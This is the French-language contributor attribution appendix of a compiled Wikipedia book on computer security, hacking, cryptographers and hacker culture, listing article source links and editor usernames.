Commission nationale de l'informatique et des libertés Source: http://fr.wikipedia.org/w/index.php?oldid=94200591 Contributeurs: Adrien Cornet, Ahbon?, Al Maghi, Alain Schneider, Alain.Darles, Alecs.y, Algira, Altagna, Anidem, Anno16, Apokrif, Apollon, Atpnh, Axel33430, Badmood, Bap, Bazook, Benji X80, BernardM, Bernatus, Cdang, Chazot, ClaudeLeDuigou, Cnil, Céréales Killer, Daniel*D, Darkebene, David Latapie, Dimdamdom, DocteurCosmos, Ediacara, Ejeancolas, Erasoft24, Es2003, Escaladix, Etudiante dtcom, Fabienamnet, Fabrice Ferrer, Flobel, Fm790, Francois Trazzi, GFDL fan, GORDON FRANCK, Gene.arboit, Gloumouth1, Gonioul, Grondin, Gzen92, Hercule, Highlander, Hopea, Hordalistic, Ice Scream, JB, JackAttack, Jef-Infojef, Jtarav, KRAVAT, Kanabiz, Kelson, Kiou, Kornemuz, Koyuki, Kyro, Laurent Nguyen, Lautre02, Leag, Lilyu, Lylvic, MaCRoEco, Macassar, Mathis B, Mielle gris, Nabeth, Nakor, Nataraja, Nemoi, Neuceu, NewQuestor, NicDumZ, Nouill, Nutsy, Ollamh, PAC2, Padawane, Pano38, Paomaw, Papagrieng, Pautard, Penjo, Phe, PieRRoMaN, Pik'Ocha, Pkm75, Pufffffffffffff, Romainhk, Romanc19s, Romary, Rome2, Rpa, Ryo, Sages, Sarenne, Seb35, Seudo, Sigo, Ske, SniperMaské, Space1889, Speedspid, Ste281, Superadri, TCY, Taguelmoust, Teofilo, Thbz, Tieno, Trizek, TwoWings, Van Rijn, Vlaam, Wanderer999, Wart Dark, XDark54, Xofc, Yukito, ~Pyb, 198 modifications anonymes

Agence nationale de la sécurité des systèmes d'information Source: http://fr.wikipedia.org/w/index.php?oldid=94134614 Contributeurs: Ahbon?, Apokrif, BABEGUME, Fcarcena01, Franquis, Hercule, Jihaim, Korbend, Lylvic, Marin M., MarioS, Plyd, Sebleouf, Shinkan, Tiraden, Toutoune25, Trou, VisiteurDuJour, Xentyr, Ypichon, Épiméthée, 8 modifications anonymes

Centre d'expertise gouvernemental de réponse et de traitement des attaques informatiques Source: http://fr.wikipedia.org/w/index.php?oldid=79512269 Contributeurs: Alain.Darles, Badmood, Daniel*D, DecereBrain, DocteurCosmos, Ecosoq, Haypo, Hercule, Manu1400, NeMeSiS, Thierry Caro, Tieno, Tiraden, Toutoune25, 5 modifications anonymes

Hacking Source: http://fr.wikipedia.org/w/index.php?oldid=94658464 Contributeurs: (:Julien:), 101, 16@r, Alphos, Aoineko, Arkanosis, Arnaud.Serander, Barbelo, Bernard.guignot, Billybug, Cantons-de-l'Est, Chaps the idol, ChrisJ, Copyleft, Coyote du 86, Cpalp, Creasy, Crom1, Cyrildemont, Cœur, DG-IRAO, DocteurCosmos, Dujo, EDUCA33E, EyOne, Former user 1, Frakir, GOMEZ URBINA ALEXANDRE, Genesyos, Guidark, Guillom, H6r6tiqu6, HACKINGFOREVER, Hacking, Haypo, Hbbk, HenkvD, Hiob, Int0x-hihs, JB, JLM, Jaao80, Jcouik, Keriluamox, Laurent Nguyen, Letartean, Loadsas, Lomita, Louiz', Lunon92, Mabifixem, Marcoapc, Mathias Poujol-Rost, Matpib, Mica, Mig, Moumousse13, Moyg, Mr piot, Mstrsa, Neo-haker, NicoV, Nicolas Ray, Nodulation, Noviam, O2, Okno, PV250X, Padawane, Pamputt, Paperhouse, Perditax, Phenix awh, RRt, Rhizome, Romainhk, Romanc19s, Ryo, Salsero35, Sand, Sebleouf, Serein, Shakki, Shartmann, ShreCk, Siren, Sofian, Stef48, T, Thelvin, Tieno, Tognopop, Turb, TwinQc, VeNoM630, Victorarete, Vladoulianov, Wanderer999, Xic667, Yotna, Zitouna22, Zouavman Le Zouave, 205 modifications anonymes

Hack Source: http://fr.wikipedia.org/w/index.php?oldid=94902311 Contributeurs: 16@r, Aboutnowhere1, Affening, Agrafian Hem Rarko, Alt0160, Alvaro, Aoineko, AsTeRfr, Babatmeuh, Badmood, Barraki, Bertol, Bobcmoi, Cascou, Coyote du 86, Céréales Killer, Dereckson, EDUCA33E, Epommate, Escaladix, Esnico30, Ezm, Fabrice Ferrer, Greudin, Grimlock, Guidark, Guillom, Gzen92, HAF 932, Hemmer, Ipsum, JLM, Jmfrance, Jul, Jules78120, KoS, Koxinga, Laurent Nguyen, Letartean, Lgd, Linedwell, Liquid 2003, Lithium57, Lomita, Looxix, Losui, Malta, Marcoapc, Med, Nae-Blis, Nodulation, Noritaka666, Noviam, Ockheim, Orlodrim, Oz, Pantxoa, Prudence, Romainhk, Romanc19s, Sebb, Sebletoulousain, Shartmann, Shawn, Sodatux, Solveig, Sperner, Supercool11, Taguelmoust, TaraO, The RedBurn, Thireus, Tieno, Titlutin, Toutoune25, Vincent Lextrait, X-Javier, Xavc95, Youssefsan, Yulson, ZenMathieu, Zouavman Le Zouave, ~Pyb, Σ:-ζ)ξ, 151 modifications anonymes

Crack (informatique) Source: http://fr.wikipedia.org/w/index.php?oldid=89828712 Contributeurs: Aeleftherios, Afsgang, Alexmarco, Ayin, Badmood, Bob08, Dake, DalGobboM, Darkoneko, Disparate1980, Florian 09, Fortan, Genium, Greudin, Gzen92, Hiogui, Iunity, Koko90, Kyro, Laurent Nguyen, Liquid 2003, Looxix, Nullz, Nykozoft, Odanny10, Oliviernm, Oxo, Oz, Pano38, PierreD, Rabah201130, RenaudDubois, Rene1596, Romanc19s, Scls19fr, Seb35, Sebleouf, TcheBTchev, Tieno, Urhixidur, Vincnet, Yug, Zelda, Zetud, 83 modifications anonymes

Hacker (sécurité informatique) Source: http://fr.wikipedia.org/w/index.php?oldid=94524573 Contributeurs: 2002:4ECD:7417:0:0:0:4ECD:7417, 2A01:E35:2EBD:2410:21B:63FF:FE03:C5CF, Akeron, Anzhyo, Arroser, Awk, Ax9999, AxOFFiCiAL, Beretta vexee, Bradipus, Bub's, Clothaire.Demouzon, Courdent, Coyau, Coyote du 86, CrashFr, CyberSee, Cymbella, Dadu, DaiFh, DecereBrain, Disparate1980, Dodoïste, EDUCA33E, Elfix, Fabrice Ferrer, Freizeit, Gjarnot, Guillaume70, Gz260, Hezfamous, Husky Dream, IAlex, Indeed, Irønie, Jesmar, Kerviel j, Kesiah, Kevdave, Kikoogay Draws The Sword of Justice, Kilith, KoS, Kurapix, Kyriog, Lacrymocéphale, Lgd, Lomita, Ltrlg, MIELLE.M.FRANCE, Machin85, Manhack, Mathias Poujol-Rost, Mesrine, MicroCitron, MrTHZ, Mro, Nadin123, Necrid Master, Nodulation, Noritaka666, Olbat, Patisd, Phoenix1204, Plaupeur, Poulos, Pwapwal, Pyb, Quentinv57, Romanc19s, Sebleouf, Sebletoulousain, Shortshorts, Simon Villeneuve, Snotrq, Starus, T, The Abusive Car Chaser, Theoliane, Tieno, Toutoune25, TwinQc, Udufruduhu, Verdy p, Vincent Lextrait, Vlaam, Wanderer999, Xavxav, Xiglofre, Yotna, ZenMathieu, Zulon, 89 modifications anonymes

Cracker (informatique) Source: http://fr.wikipedia.org/w/index.php?oldid=94387523 Contributeurs: Aleks, AlphaX, Anthena, Archaos, Archeos, Arnaudb, Ayin, Badmood, Bayo, Bob08, Clem23, Cyph3r, Céréales Killer, Dadu, Dereckson, Disparate1980, Dromygolo, Epommate, FoeNyx, Francis, Francois Trazzi, Greudin, Grimlock, Guillaume Gielly, Gzen92, Hercule, Hiogui, Sources et contributeurs de l’article 478

Jarfe, Jastrow, Jflesch, Keitaro27180, Kilianours, Koko90, Koxinga, Koyuki, LUDOVIC, Lafcadio, Lafoudre1523, Liquid 2003, Looxix, Marin M., Med, Michel BUZE, Mikue, MisterMatt, Moez, Moipaulochon, Nataraja, Neitsa, Nicolas Ray, Nodulation, Nono64, Nouill, Orthogaffe, Oz, Pamputt, Pcouderc, Penjo, Peyot, Phe, Pontauxchats, Psyc0s, Reivilo, RenaultR83, Rigolithe, Silverengen, T, Tieno, Trusty, Urhixidur, Vlad2i, Vyk, Xtremes, 149 modifications anonymes

White hat Source: http://fr.wikipedia.org/w/index.php?oldid=92973828 Contributeurs: -Nmd, 307sw136, Ahbon?, Arnaud Dessein, Awk, Badmood, Baltos, Bbruet, Chôji, CyberSee, Eli613, Elnon, Fafnir, Florence Frigoult, Francois Trazzi, HAF 932, Hiogui, Kelsett, Kyle the hacker, Lacrymocéphale, Marxisme94310, MicroCitron, Mindo, Nodulation, Padawane, Phoenix1204, Radamanthe, Sammyday, Stormy Ordos, T, Tieno, Vincent Ramos, 22 modifications anonymes

Grey hat Source: http://fr.wikipedia.org/w/index.php?oldid=94554660 Contributeurs: Across.land.and.time, Captainm, Casteres, Cm8, Criric, Fluti, Hiogui, Loveless, Nodulation, Philippe.petrinko, T, Tieno, Wikig, Yotna, 17 modifications anonymes

Black hat Source: http://fr.wikipedia.org/w/index.php?oldid=94115800 Contributeurs: 2A01:E34:EE28:91D0:7429:EEF6:CDFA:19A3, Across.land.and.time, Anapn, Aris, Awk, Badmood, Bigbosses, Bob08, Cedringen, Dadu, DecereBrain, Elfix, Epommate, Florence Frigoult, Francois Trazzi, Ghislain Montvernay, Greudin, HAF 932, Hiogui, Manhack, Meik, MetalGearLiquid, Mindo, Mykii, Nodulation, Nono64, Phoenix1204, Pointeur, Randmot, Seoschrijver, Simon Villeneuve, Slaborde, Ste281, T, Tieno, Vspaceg, 26 modifications anonymes

Chaos Computer Club Source: http://fr.wikipedia.org/w/index.php?oldid=91796442 Contributeurs: Alastair, Asr, Belial57, Bilbo, Bob08, ClementNotin, DecereBrain, DjaZz, Ektoplastor, Epommate, Felixggenest, Francois Trazzi, Grimlock, H2Fr Master, Iznogood, Jmax, Kehezen, Kelson, L'engoulevent, Maha, Mishkoba, Mogador, NicoRay, Nirmos, Norskskogkatt, Oxo, Papillon, Phe, Sbi, Sebleouf, Spooky, Ste281, Tieno, Toutoune25, Épiméthée, 28 modifications anonymes

Hacking For Girliez Source: http://fr.wikipedia.org/w/index.php?oldid=82386499 Contributeurs: Benouzz, Célestin Moreau, Esprit Fugace, Korrigan, Koyuki, L0stman, Necrid Master, Nonoxb, Philibre, Sebletoulousain, Sherbrooke, Tieno, Vincnet, 3 modifications anonymes

Boris Floricic Source: http://fr.wikipedia.org/w/index.php?oldid=90017248 Contributeurs: (:Julien:), Apokrif, Asabengurtza, Badmood, Bbullot, Bibi Saint-Pol, BrightRaven, Copyleft, EDUCA33E, Kelson, Korg, Kyle the hacker, Ma chaussette-marionnette, Mogador, Mokarider, Neuromancien, NicoRay, Sherbrooke, T, Tieno, Wart Dark, 11 modifications anonymes

Kevin Mitnick Source: http://fr.wikipedia.org/w/index.php?oldid=94399286 Contributeurs: 2A01:E35:8B77:9930:2DA3:1F3C:5BD1:C984, Acélan, Agnubis, AinaX, Alex-F, Almeo, AlphaX, Alphos, Ash Crow, Atheox, Badmood, Bap, BeTa, Bloody-libu, Cantons-de-l'Est, Chub, Cutter, Cyph3r, Dake, David Berardan, Diwann, Duloup, Elite In Hacking, Fcoronis, Fikk, Franck Dernoncourt, Francois Trazzi, Garfieldairlines, Gene.arboit, Ggal, Givet, Gotrek, Greudin, Gribeco, Gz260, Gzen92, Hashar, INyar, Indus, Inisheer, Jahvascriptmaniac, Kaineos, Kelson, Khardan, Koko90, Korg, Koyuki, L0stman, LUDOVIC, Looxix, M0tty, Maggic, Mishkoba, Moez, Nodulation, Nono64, Okki, Ollamh, OniLink, Orlodrim, Orthogaffe, Oz, Panoramix, Phd0, Phe, Pour, Raph, Raphaël, Raude, Reclame, Romary, Sam Hocevar, Sand, Sebb, Serein, SharedX, Shawn, Sherbrooke, SilbornTheProton, Slycooper, Sogyam, Spamm, Superborsuk, T, Thanatos, TheAnarcat, Tieno, Tos42, Traroth, Vega, Vlaam, Wind89, Witoki, Xstevenne, Yoman49, 122 modifications anonymes

Mudge (hacker) Source: http://fr.wikipedia.org/w/index.php?oldid=94483857 Contributeurs: Ggal, Jef-Infojef, Koyuki, L0stman, Ohma, Romanc19s, Sebletoulousain, T, Tieno, 6 modifications anonymes

Kevin Poulsen Source: http://fr.wikipedia.org/w/index.php?oldid=92251453 Contributeurs: Arnaud.Serander, Ash Crow, Badmood, Bloody-libu, Diamond444, Franckiz, Greteck, HERMAPHRODITE, Jef-Infojef, Jgremillot, JiPé, Kaineos, Kelson, Koyuki, L0stman, LUDOVIC, La Cigale, Litlok, Necrid Master, Nono64, Nouill, Ollamh, Oxo, Raphaël, Ryo, Sebletoulousain, Shawn, Sherbrooke, Soak, T, Tieno, XpMaster, Ytrezap, ^Jerem, 10 modifications anonymes

Theo de Raadt Source: http://fr.wikipedia.org/w/index.php?oldid=94563837 Contributeurs: 16@r, Alain Mignien, Almacha, Armedblowfish, Badmood, Bloodqc, Cardabela48, Dblanche, Dr gonzo, GLec, Gaudio, Jcabillot, Koyuki, Melkor73, Mith, Nezdek, Okki, Pap furax, Patrick guignot, Ripat, Régis Décamps, T, Tieno, Valérie75, Vargenau, Xic667, Yukito, Zerly, 16 modifications anonymes

Leonard Adleman Source: http://fr.wikipedia.org/w/index.php?oldid=92404160 Contributeurs: 307sw136, Arkanosis, Badmood, Bob08, Cardabela48, Dake, GLec, Gene.arboit, Gilles.L, Laocian, Lysosome, MathsPoetry, NicoV, Oyp, Phe, Philippe rogez, Polmars, Roll-Morton, Serged, Speculos, Stanlekub, Tieno, Urban, YMS, 1 modifications anonymes

Charles H. Bennett Source: http://fr.wikipedia.org/w/index.php?oldid=92135750 Contributeurs: Arrakis, Badmood, Bouchecl, CommonsDelinker, Hercule, Kilom691, Kolossus, Nono64, Pierregil83, Sebleouf, Stéphane33, Tieno, Van Kanzaki, Vincen, 2 modifications anonymes

Gilles Brassard Source: http://fr.wikipedia.org/w/index.php?oldid=89927523 Contributeurs: Ancien et moderne, Cardabela48, Colocho, Dake, David Berardan, Gene.arboit, Joris.deguet, Mig, Oxxo, Phe, Poleta33, QuebecPureLaine, Rune Obash, Sebb, Sebrider, Sherbrooke, ThF, Tieno, Van Kanzaki, Vincen, 17 modifications anonymes

Don Coppersmith Source: http://fr.wikipedia.org/w/index.php?oldid=91568912 Contributeurs: Badmood, Dake, Dtcube, Gene.arboit, JackPotte, Jimmy-jambe, Nono64, Phe, Piscou35, Romary, Sebleouf, Stanlekub, Stéphane33, Tieno, Zetud, 1 modifications anonymes

Whitfield Diffie Source: http://fr.wikipedia.org/w/index.php?oldid=89825994 Contributeurs: Alexandre, Arkanosis, Badmood, Cardabela48, Dake, HaguardDuNord, Lysosome, MisterMatt, Mudares, Natmaka, Nono64, Phe, Remi Mathis, Sherbrooke, Steff, Tieno, Vlaam, 4 modifications anonymes

Hans Dobbertin Source: http://fr.wikipedia.org/w/index.php?oldid=93187784 Contributeurs: Badmood, Dake, David Berardan, Gene.arboit, Jarfe, Jesi, Seb35, Tieno, 2 modifications anonymes

Taher Elgamal Source: http://fr.wikipedia.org/w/index.php?oldid=94256894 Contributeurs: AlexanderKlink, Badmood, Cardabela48, Dake, Elg, Fahd.Walid, Gene.arboit, Huster, Jaymz Height-Field, Kiwipedia, Nono64, Stanlekub, Steff, Tegu, Tieno, Vlad09, 4 modifications anonymes

Horst Feistel Source: http://fr.wikipedia.org/w/index.php?oldid=92245320 Contributeurs: Badmood, Chris93, Dake, Haypo, Jef-Infojef, Matpib, Nono64, Nuvysta, Tieno, 2 modifications anonymes

Martin Hellman Source: http://fr.wikipedia.org/w/index.php?oldid=92984298 Contributeurs: Alexandre, Archibald, Arkanosis, Badmood, Dake, Freewiki, Greteck, HLenormand, Koyuki, Leag, Lysosome, MisterMatt, Nono64, OsMoSe, Phe, Remi Mathis, Ryo, Sherbrooke, Stanlekub, Ste281, Tieno, Valérie75, Vlaam, 2 modifications anonymes

Xuejia Lai Source: http://fr.wikipedia.org/w/index.php?oldid=89896059 Contributeurs: Badmood, Dake, Litlok, Mirgolth, Tegu, Tieno, 2 modifications anonymes

Arjen Lenstra Source: http://fr.wikipedia.org/w/index.php?oldid=90010844 Contributeurs: Badmood, Cardabela48, Dake, Gene.arboit, Ghuysmans99, Grecha, Koyuki, Nono64, Tieno, Val25ch, Verbex, XIIIfromTOKYO, 2 modifications anonymes

James Massey Source: http://fr.wikipedia.org/w/index.php?oldid=94585748 Contributeurs: 307sw136, Arkanosis, Badmood, Cardabela48, ClementSeveillac, Dake, Dtcube, Eusebius, Greteck, JÄNNICK Jérémy, Kubieziel, Lysosome, Mirgolth, Ollamh, Pierregil83, Sbrunner, Tieno, Yerauy, 1 modifications anonymes

Ralph Merkle Source: http://fr.wikipedia.org/w/index.php?oldid=94018132 Contributeurs: Alexandre, Arkanosis, Badmood, Bob08, Chris93, Dake, Dtcube, Gene.arboit, JKHST65RE23, JackPotte, Jef-Infojef, Lysosome, MisterMatt, OsMoSe, Phe, Sisyph, Stanlekub, Tieno, Vlaam, 2 modifications anonymes

David Naccache Source: http://fr.wikipedia.org/w/index.php?oldid=91276783 Contributeurs: AlexanderKlink, Applespice, Atpnh, Badmood, Bapti, Bob08, Ehannezo, Hercule, Jarfe, Jérémie, Nicolas Ray, Place Clichy, Suprememangaka, TheWize, Tieno, 11 modifications anonymes

Phong Nguyen Source: http://fr.wikipedia.org/w/index.php?oldid=73987033 Contributeurs: Badmood, Boréal, Dake, David.Monniaux, Dtcube, Ediacara, Fm790, Hemmer, Hercule, Karl1263, Marcfrisch, Ollamh, Pierre-Yves Rofes, Poleta33, Rune Obash, Sherbrooke, The faker, Tieno, 21 modifications anonymes

Bart Preneel Source: http://fr.wikipedia.org/w/index.php?oldid=89911602 Contributeurs: A3 nm, Badmood, Dake, Grecha, JNélis, Piku, Tieno, 1 modifications anonymes

Ronald Rivest Source: http://fr.wikipedia.org/w/index.php?oldid=89833810 Contributeurs: Anne Bauval, Arkanosis, Arronax50, Badmood, Bayo, Cantons-de-l'Est, Ce`dric, ClementSeveillac, CommonsDelinker, Dake, DocteurCosmos, Dtcube, GLec, Gene.arboit, Houston83, Kilom691, Kiwipedia, Koyuki, Lc, Loreleil, Love Sun and Dreams, Lysosome, Margelabarge, Markadet, NicoV, Nono64, Oyp, Ranska, Sam Hocevar, Tegu, Tieno, YMS, 3 modifications anonymes

Bruce Schneier Source: http://fr.wikipedia.org/w/index.php?oldid=89886382 Contributeurs: Archibald, Artiflo, Badmood, Bibi Saint-Pol, Dake, Dtcube, FitzSai, Haypo, Huster, Isaac Sanolnacov, Kilom691, LittleSmall, Marc Mongenet, Mirgolth, MisterMatt, Nono64, Remi Mathis, Salix, Sanao, Tegu, Tieno, Vlaam, [email protected], 4 modifications anonymes Sources et contributeurs de l’article 479

Adi Shamir Source: http://fr.wikipedia.org/w/index.php?oldid=94927030 Contributeurs: Badmood, Bob08, Cardabela48, Dake, Dereckson, DocteurCosmos, Dtcube, Faigl.ladislav, Franckiz, GLec, Gene.arboit, Grimlock, Isaac Sanolnacov, Jef-Infojef, Jerome66, NicoV, Nono64, Orlodrim, Oyp, Pablor44, Pautard, RaphaelQS, Roll-Morton, SaraBiYo, Spooky, Tegu, Tieno, 2 modifications anonymes

Dmitry Sklyarov Source: http://fr.wikipedia.org/w/index.php?oldid=90143165 Contributeurs: Akeron, AlexanderKlink, Badmood, Bdoin, Jean-Jacques Georges, Loveless, Nono64, Owski, Tieno, 1 modifications anonymes

Jacques Stern (cryptologue) Source: http://fr.wikipedia.org/w/index.php?oldid=93059803 Contributeurs: 2514, Acer11, Agamitsudo, Aqua5, Arnaud.Serander, Arthur MILCHIOR, Badmood, Coyau, Dake, David.Monniaux, Dhatier, DocteurCosmos, Dtcube, Enro, Flfl10, Greteck, Leag, Lpele, Manu1400, Marc Mongenet, Mmenal, PIerre.Lescanne, Pasdideedenom, PhS, Place Clichy, Poleta33, Sherbrooke, Speculos, TheWize, Tieno, Traleni, XIIIfromTOKYO, 28 modifications anonymes

Philip Zimmermann Source: http://fr.wikipedia.org/w/index.php?oldid=94688908 Contributeurs: 2A01:E35:2E52:79B0:8D46:DA68:15BB:7961, Badmood, Bob08, CR, Dake, Jblndl, Jd, Louis-garden, MisterMatt, Neustradamus, Nyco, Remi Mathis, Sam Hocevar, Tieno, Valérie75, 5 modifications anonymes

Serdar Argic Source: http://fr.wikipedia.org/w/index.php?oldid=91087776 Contributeurs: Acidben, Alvaro, Badmood, COLETTE, Ceedjee, Cymbella, Dave, David Latapie, Dirac, Elg, Eristik, Ernest, Fafnir, HDDTZUZDSQ, Hercule, Jerome234, Mm, Moumine, Mro, Nataraja, Nkm, Ork, Orthogaffe, Oz, Pabix, Panoramix, Phe, Phido, Pontauxchats, Rhadamante, Sardur, Semnoz, Shaitan, Steff, Tieno, Wuyouyuan, Étudiant, 10 modifications anonymes

Michael Calce Source: http://fr.wikipedia.org/w/index.php?oldid=91575377 Contributeurs: ADM, AntonyB, Badmood, Ben fadhl, Bloodqc, Bouchecl, Chaoborus, Emmissaire922, Eumolpo, Fluti, Grosnombril, Iluvalar, Jonwolf, Jorioux, Keanur, Koko90, Kossin, Kropotkine 113, L0stman, Louperivois, Lysosome, MashUp, Michudon, Mimideschamps, Mkc, Moutarde, Nono64, Pautard, SamuelFreli, Sebletoulousain, Sherbrooke, Stéphane33, The Titou, Tibauk, Tieno, Xic667, 36 modifications anonymes

Edward Snowden Source: http://fr.wikipedia.org/w/index.php?oldid=94927015 Contributeurs: 2A01:E34:EC03:7600:21C:B3FF:FEB1:91D8, 2A01:E35:8AD1:8140:180D:81BD:969E:D4F2, 2A01:E35:8AD1:8140:357A:A2C4:49E4:7D56, 2A01:E35:8AD1:8140:39F8:E47F:F33C:8E24, 2A01:E35:8AD1:8140:44BC:BA82:E8E1:57CF, 2A01:E35:8AD1:8140:45E1:E661:D6F2:6776, 2A01:E35:8AD1:8140:4930:1142:FB3D:21A1, 2A01:E35:8AD1:8140:4D2E:84B8:DE94:4776, 2A01:E35:8AD1:8140:5087:7A89:275B:FFD8, 2A01:E35:8AD1:8140:54BD:133E:154C:C7A9, 2A01:E35:8AD1:8140:748C:1166:1866:2C9F, 2A01:E35:8AD1:8140:8D4A:7DE2:2C0:8A65, 2A01:E35:8AD1:8140:8DEF:9DB7:3B45:66F5, 2A01:E35:8AD1:8140:98D8:8922:528:44C9, 2A01:E35:8AD1:8140:9C26:6D60:1120:51C3, 2A01:E35:8AD1:8140:9C6D:C3F7:C3D2:5170, 2A01:E35:8AD1:8140:A0CE:837C:3DC9:272, 2A01:E35:8AD1:8140:A1B6:DEA8:FFF0:9210, 2A01:E35:8AD1:8140:A42B:8565:D459:50DE, 2A01:E35:8AD1:8140:B0C6:A602:52E3:7C88, 2A01:E35:8AD1:8140:C4A7:D048:B0E2:C78D, 2A01:E35:8AD1:8140:CC8A:DCDC:B286:CEFE, 2A01:E35:8AD1:8140:CD0B:805A:9DDD:4FE2, 2A01:E35:8AD1:8140:D024:389B:439D:10B1, 2A01:E35:8AD1:8140:D939:D9E9:C5EB:2F97, 2A01:E35:8AD1:8140:D99F:13C7:DBA7:D3C, 2A01:E35:8AD1:8140:DDB8:DE00:A379:B7FB, 2A01:E35:8AD1:8140:E045:28A0:1EE:AEB2, 2A01:E35:8AD1:8140:E469:DB84:E595:D2DC, 2A01:E35:8AD1:8140:E488:391B:5900:ADA4, 2A01:E35:8AD1:8140:EDD1:51A6:8D9E:4B6B, 2A01:E35:8AD1:8140:EDEF:E58F:D063:7498, 2A02:8420:637E:1200:81DC:7930:62D1:1932, Amine Brikci N, Amqui, Ange Gabriel, Apokrif, Aubencheulobois, BTH, Bbruet, Cantons-de-l'Est, Celette, Claude Lacombe, Cobra bubbles, Crickxson, Curdbeana, Céphide, Dadu, DocteurCosmos, Dodudidochon, EvguenieSokolov, Fabrice Ferrer, Filorinwiki, Freephil, G de gonjasufi, GastelEtzwane, Hercule, Hégésippe Cormier, Jean-Jacques Georges, Jules78120, Julien.DLBT, KKNIK, Kimdime, Krassotkin, Le vrai olaf, LectriceDuSoir, Lmaltier, Lysosome, Maxime93, Mkaczor2000, Neun-x, Orezybedivid, Penyulap, Popolon, Puff, Rob1bureau, S0l0xal, Sdnalreden, Seb13la, Sebleouf, SniperMaské, VisiteurDuJour, WhisperToMe, Wikig, Zugmoy, Éric Messel, 77 modifications anonymes

Misc Source: http://fr.wikipedia.org/w/index.php?oldid=90488156 Contributeurs: Gonzolito, Linan, Skippy le Grand Gourou, Toutoune25

Hakin9 Source: http://fr.wikipedia.org/w/index.php?oldid=90416890 Contributeurs: Coyote du 86, Es2003, Hegor, Mathias Poujol-Rost, 3 modifications anonymes

Phrack Source: http://fr.wikipedia.org/w/index.php?oldid=89874667 Contributeurs: Apfelstrudel, Awk, Badmood, Chaps the idol, DecereBrain, Es2003, Floflo76, Haypo, Hydrel, L0stman, Laurent Nguyen, Litlok, Lmaltier, MisterMatt, Pautard, Sherbrooke, T, Tbowan, Tieno, Toutoune25, 23 modifications anonymes

Réseaux & Télécoms Source: http://fr.wikipedia.org/w/index.php?oldid=88232444 Contributeurs: Badmood, Fredtoc, Kornemuz, Muad, Nikolaos, Phe, Tieno, 1 modifications anonymes

Hackademy Magazine Source: http://fr.wikipedia.org/w/index.php?oldid=62760172 Contributeurs: Apokrif, Badmood, Carrera21, Falldownthestairshard, Fredtoc, Like tears in rain, Lucskywalker, Nikolaos, Phe, Poleta33, Tieno, Yanngeffrotin, Zetud, 12 modifications anonymes

Die Datenschleuder Source: http://fr.wikipedia.org/w/index.php?oldid=90157674 Contributeurs: Badmood, Med, Nemoi, Nikolaos, Sebletoulousain, T, Thierry Caro, Tieno

2600: The Hacker Quarterly Source: http://fr.wikipedia.org/w/index.php?oldid=89962155 Contributeurs: Badmood, DecereBrain, Es2003, GDC, GaMip, Hydrel, Koyuki, Litlok, Rémih, Sabri76, Sarrazip, Sherbrooke, Stanlekub, T, Tegu, Tieno, Z1pher, Zakke, Zelda, 9 modifications anonymes

Cult of the Dead Cow Source: http://fr.wikipedia.org/w/index.php?oldid=90137330 Contributeurs: Badmood, Cantons-de-l'Est, ChloeD, Genium, Lomita, MacteAnimo, Nono64, Romainhk, Tieno, Zelda, 2 modifications anonymes

Le Virus informatique Source: http://fr.wikipedia.org/w/index.php?oldid=80144801 Contributeurs: Alchemica, Apokrif, Arnaud.Serander, Badmood, Céréales Killer, Emericpro, Emirix, Francois Trazzi, Fredtoc, Howard Drake, Huster, Kevingri, Liberalfofo, Lpele, Mayayu, Mm, Nikolaos, Romainhk, Tieno, Vlaam, 15 modifications anonymes

SANS Institute Source: http://fr.wikipedia.org/w/index.php?oldid=89997500 Contributeurs: Badmood, DG-IRAO, Moloko, Nono64, Seb35, Sherbrooke, Tieno, 5 modifications anonymes

SecurityFocus Source: http://fr.wikipedia.org/w/index.php?oldid=89920089 Contributeurs: Badmood, Lacivelle, Rhadamante, Tieno, Toutoune25, 4 modifications anonymes

23 (film) Source: http://fr.wikipedia.org/w/index.php?oldid=92929573 Contributeurs: Badmood, Bbullot, Cekli829, Coyau, Deansfa, Gogote, Gu1ll4um3r0m41n, Herr Satz, Like tears in rain, Mikani, Mith, NicoRay, NicoV, Passoa15, Piku, Polmars, Samsa, Sins We Can't Absolve, Skull33, Stef48, T, Tieno, Vyk, Éric Messel, 25 modifications anonymes

Cybertraque Source: http://fr.wikipedia.org/w/index.php?oldid=92701979 Contributeurs: Badmood, Bbullot, Bloodqc, Coyote, David Latapie, Guigui668, Koyuki, Labbaipierre, Ludoesch, Mro, Octavius, Paqpaq94, Pingoomax, Psebcool, Ryo, Sam Hocevar, Sisyph, Slaborde, T, TheAnarcat, Tieno, Trizek, Voxhominis, 16 modifications anonymes

Die Hard 4 : Retour en enfer Source: http://fr.wikipedia.org/w/index.php?oldid=94541859 Contributeurs: A2, Al Houser, Alchemica, Ardias, Badmood, BlakaJango, Chetao, Colindla, Coyote du 86, Cyberugo, Céréales Killer, Darkee, Doofyth, FR, Factory, Flerhun, Floc200, Gonioul, Guil2027, Hercule, Huster, IPierrot, Jbbizard, Jesmar, Jules78120, Jura1970, Kilianours, Kilojoule, Kingbastard, Koverchenko, Le sotré, Lepsyleon, Luxy68, Mikis, Mith, NeMeSiS, NemesisIII, Nodulation, Nono64, Okki, Ollamh, Olyvar, Oxo, Paqpaq94, Patrick Rogel, Penjo, Pk-Undying, Renlaut-974, Rilou du Cotentin, RomainDoom, Rossoneri, Rowoasis, Sherbrooke, SoLune, Tieno, Vallenain, Vspaceg, XZombi, Xzapro4, Énéwiki, 87 modifications anonymes

EXistenZ Source: http://fr.wikipedia.org/w/index.php?oldid=93866552 Contributeurs: Alexboom, Alphabeta, Ash Crow, Badmood, Badzil, Bayo, Bibi Saint-Pol, Bonjour, Bulat, Cdang, Chris a liege, Céréales Killer, Deansfa, Dereckson, Dfeldmann, Dozlune, Ediacara, Fabrice Ferrer, Francois Trazzi, Fred.th, Gizmolechat, Goldenox, Gonioul, Génétiquement modifié, Hauru, Howard Drake, Huster, Isaac Sanolnacov, Kassus, Kilianours, Korg, Kropotkine 113, Laurence67, Lee Woo-jin, Lgd, Like tears in rain, Lilyu, Lola Voss, Lomita, MathsPoetry, MetalGearLiquid, Mith, Morburre, Mro, Nataraja, Okki, Olyvar, Ork, Orthogaffe, Padawane, Paqpaq94, Patangel, Phe, PieRRoMaN, Pioupiou962, Pok148, Polmars, Poulpy, Romainhk, Romanc19s, Rudloff, Sebb, Sherbrooke, Stef48, Titlutin, TwoWings, Utopies, VIGNERON, Vincent.vaquin, Voxhominis, W'rkncacnter, Wagner51, ZeroJanvier, Éric Messel, 36 modifications anonymes

